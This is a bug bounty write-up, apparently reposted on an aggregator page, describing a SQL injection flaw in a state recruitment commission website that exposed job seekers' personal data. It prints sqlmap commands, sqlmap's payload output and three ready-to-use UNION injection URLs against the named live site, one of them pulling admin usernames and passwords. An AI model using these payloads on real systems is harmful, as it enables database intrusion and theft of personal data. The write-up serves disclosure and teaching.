.png)
8 hours ago
9 BOOK THIS SPACE FOR AD
ARTICLE ADThis blog discusses the discovery of an SQL Injection vulnerability on State Level Recruitment Commission (SLRC) asset, which was exposing the personal information of 1.1 million job seekers.
Hello, my name is Biraj Baishya, aka brutexploiter. I am an independent security researcher, a full-time bug bounty hunter, and a mechanical engineer.
In this write-up, I will discuss how I discovered an SQL Injection vulnerability and protected the data of approximately 1.1 million job seekers. This vulnerability could have been exploited by cyber attackers, potentially leading to a massive data breach.
Let’s begin… but first, let’s learn some basic terms:
SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. This can allow an attacker to view data that they are not normally able to retrieve. This might include data that belongs to other users, or any other data that the application can access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.
Read more: https://portswigger.net/web-security/sql-injection
The discovery phase of the vulnerability is quite interesting. I visited https://staterecruit.in as a job seeker. Since the government recently announced Grade III and Grade IV jobs, I visited the site and began the job application process. As a security enthusiast, whenever you surf the web, you’re naturally curious about how things work.
After submitting the form, I encountered the acknowledgment page, which seemed fine. However, my first question was: how is the data retrieved from the server? To investigate further, I opened the Developer Tools in Firefox (F12) and navigated to the Network tab. Since I couldn’t see any API calls, I concluded that the id parameter is responsible for data retrieval from the database.
https://staterecruit.in/GrAde_iii_2023/WebPages/RegReport.php?id={C9A9E5EA-0000-6E67-4340-A4BA4BF20E08}The first thing that came to my mind after seeing the id parameter is SQL Injection. Since the id parameter is one of the most common targets for SQL Injection attacks.
When testing for SQL Injection, the first step is to detect the SQL injection vulnerability. Therefore, the first thing I did was enter a single quote character ' and look for errors or other anomalies. Upon entering the single quote character ', the server throws a SQL error in response.
Note: Sometimes the server won’t show any error message in response. In that case, we have to test for blind SQL Injection.
The next thing is to find the number of columns and query the database type and version.
For Finding the columns:
ORDER BY 1
ORDER BY 2
ORDER BY 3 and so on
For querying the database:
To automate the process I have used sqlmap.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
sqlmap command:
sqlmap -r req.txt --batch --force-ssl --level 5 --risk 3sqlmap result:
Parameter: id (GET)Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=test' AND EXTRACTVALUE(6427,CONCAT(0x5c,0x716a6a6271,(SELECT (ELT(6427=6427,1))),0x717a767a71)) AND 'zBLQ'='zBLQ
Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=test' AND (SELECT 4881 FROM (SELECT(SLEEP(5)))YnXf) AND 'qGsw'='qGsw
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: id=test' UNION ALL SELECT CONCAT(0x716a6a6271,0x525a6479634a525071674d6b774a4873775944464259496c6d58585878727246686e6252426a615a,0x717a767a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
Vector: UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -sqlmap -r req.txt --batch --force-ssl --level 5 --risk 3 --dbs
Observe that the server returns an SQL error.
Payloads:
https://staterecruit.in/GrAde_iii_2023/WebPages/RegReport.php?id=test%27%20UNION%20ALL%20SELECT%201,2,3,group_concat(schema_name),5,6,7,8,9,10%20FROM%20information_schema.schemata--%20-https://staterecruit.in/GrAde_iii_2023/WebPages/RegReport.php?id=test%27%20UNION%20ALL%20SELECT%201,2,3,group_concat(id,username,password,user_role),5,6,7,8,9,10%20FROM%20idol_slrc_class_iii_2023.admin_user--%20-https://staterecruit.in/GrAde_iii_2023/WebPages/RegReport.php?id=test%27%20UNION%20ALL%20SELECT%201,2,3,@@hostname,5,6,7,8,9,10--%20-Successful exploitation of this vulnerability could result in unauthorized access to sensitive data, modification of database contents, or other actions depending on the permissions associated with the database user.
Personally Identifiable Information (PII) :
Aadhar NumberAddress
Caste
City
Educational Qualifications
Email Address
Full Name
Gender
Mobile Number
Religion
Password
On the bright side, the data of 1.1 million job seekers is secure now. Unfortunately, some organizations address the issue quietly and proceed without providing any acknowledgment or update regarding the fix.
Nonetheless, what truly matters is that the data of 1.1 million users is now safer, and that remains my primary concern.
Thank you for reading. I hope you enjoyed reading the write-up!
References:
For collaboration or any other queries, please contact me at brutexploiter@gmail.com
Bengali (Bangladesh) · 
English (United States) ·